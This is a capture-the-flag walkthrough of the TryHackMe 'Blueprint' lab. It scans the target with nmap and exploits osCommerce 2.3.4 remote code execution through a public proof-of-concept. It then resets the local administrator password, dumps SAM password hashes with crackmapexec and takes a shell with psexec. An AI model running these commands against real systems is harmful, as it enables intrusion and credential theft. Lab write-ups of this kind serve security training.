Blueprint
https://tryhackme.com/room/blueprint
Nmap
sudo nmap 10.10.153.99 -sV -sS
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
Starting out we check port 8080 and find that a web server is running. The root page presents us with an index page where we see the commerce system oscommerce 2.3.4 is installed.

A simple preliminary check with searchsploit
shows multiple vulnerabilities with this version.
searchsploit oscommerce 2.3.4 -w

Searching for Remote Code Execution exploits on GitHub shows a PoC from the user nobodyatall648.
GitHub: https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
Which has the following definition for the exploit:
"Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php".
Using the example provided on GitHub we clone the repo and run with the following syntax:
python3 exploit.py http://<IP>/oscommerce-2.3.4/catalog/

After gaining a SYSTEM level shell on the target system we now aim to gain a proper reverse shell. As well as dump the hashes from the target system.
With SYSTEM access we change the local administrator password.
net user administrator Password123
Then use crackmapexec
to dump the NTLM hashes from the SAM file.
crackmapexec smb '10.10.153.99' -u 'Administrator' -p 'Password123' --local-auth --sam

After dumping hashes from SAM we then use psexec.py
to gain shell access to the target system.
psexec.py ./administrator:'Password123'@'10.10.153.99'

Last updated